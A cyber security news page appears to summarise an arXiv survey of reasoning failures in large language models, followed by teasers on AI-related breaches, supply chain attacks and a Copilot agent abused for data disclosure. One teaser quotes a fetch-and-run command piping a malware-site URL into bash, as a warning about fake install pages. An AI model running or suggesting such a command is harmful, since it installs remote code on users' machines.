Large Language Model Reasoning Failures

Large Language Models (LLMs) have exhibited remarkable reasoning capabilities, achieving impressive results across a wide range of tasks. Despite these advances, significant reasoning failures persist, occurring even in seemingly simple scenarios. To systematically understand and address these shortcomings, the authors of the paper present the first comprehensive survey dedicated to reasoning failures in LLMs.

The authors introduce a novel categorization framework that distinguishes reasoning into embodied and non-embodied types, with the latter further subdivided into informal (intuitive) and formal (logical) reasoning. In parallel, the authors classify reasoning failures along a complementary axis into three types: fundamental failures intrinsic to LLM architectures that broadly affect downstream tasks; application-specific limitations that manifest in particular domains; and robustness issues characterized by inconsistent performance across minor variations. For each reasoning failure, the authors provide a clear definition, analyze existing studies, explore root causes, and present mitigation strategies.

Read more…
Source: ARXIV, Cornell University

Sign up for the Cyber Security Review Newsletter
The latest cyber security news and insights delivered right to your inbox

Anthropic confirms it leaked 512,000 lines of Claude Code source code — spilling some of its biggest secrets
April 1, 2026
An Anthropic employee accidentally leaked the source code for one of the most popular Artificial Intelligence (AI) assistants out there – Claude Code. Security researcher Chaofan Shou posted on X, saying “Claude Code source code has been leaked via a map file in their npm registry!” The tweet itself was viewed more than 30 million times ...
Weaponizing the Protectors: TeamPCP’s Multi-Stage Supply Chain Attack on Security Infrastructure
March 31, 2026
Between late February and March 2026, threat group TeamPCP conducted a highly calculated, escalating sequence of supply chain threats. It systematically compromised widely trusted open-source security tools, including the vulnerability scanners Trivy and KICS and the popular AI gateway LiteLLM. The affected software also includes the official Python SDK of Telnyx. These ongoing supply chain attacks ...
AI Drives Cyber Attacks That Unfold in Minutes
March 24, 2026
Artificial intelligence is speeding up timelines for cyber attacks, a new report has found, creating what the authors call a widening “cybersecurity speed gap” between bad actors and defense efforts. The report from Booz Allen Hamilton, published this month, shows that cyber criminals are now moving from initial access to broader system compromise in less than ...
Three Supermicro employees charged with conspiracy to smuggle restricted Nvidia chips to China
March 20, 2026
A federal investigation has been launched after the US Department of Justice charged three individuals for allegedly smuggling restricted Nvidia AI chips to China. The three men were not named in court documents, however a statement released by Super Micro Computer Inc. identified those involved. The smuggling allegedly occurred between 2024 and 2025, with billions of ...
Critical Microsoft Excel bug weaponizes Copilot Agent for zero-click information disclosure attack
March 10, 2026
After a whopper of a Patch Tuesday last month, with six Microsoft flaws exploited as zero-days, March didn’t exactly roar in like a lion. Just two of the 83 Microsoft CVEs released on Tuesday are listed as publicly known, and none is under active exploitation, which we’re sure is a welcome change to sysadmins. Another eight ...
Fake Claude Code install pages hit Windows and Mac users with infostealers
March 9, 2026
Attackers are cloning install pages for popular tools like Claude Code and swapping the “one‑liner” install commands with malware, mainly to steal passwords, cookies, sessions, and access to developer environments. Modern install guides often tell you to copy a single command like curl https://malware-site | bash into your terminal and hit Enter. That habit turns the ...

...

Related: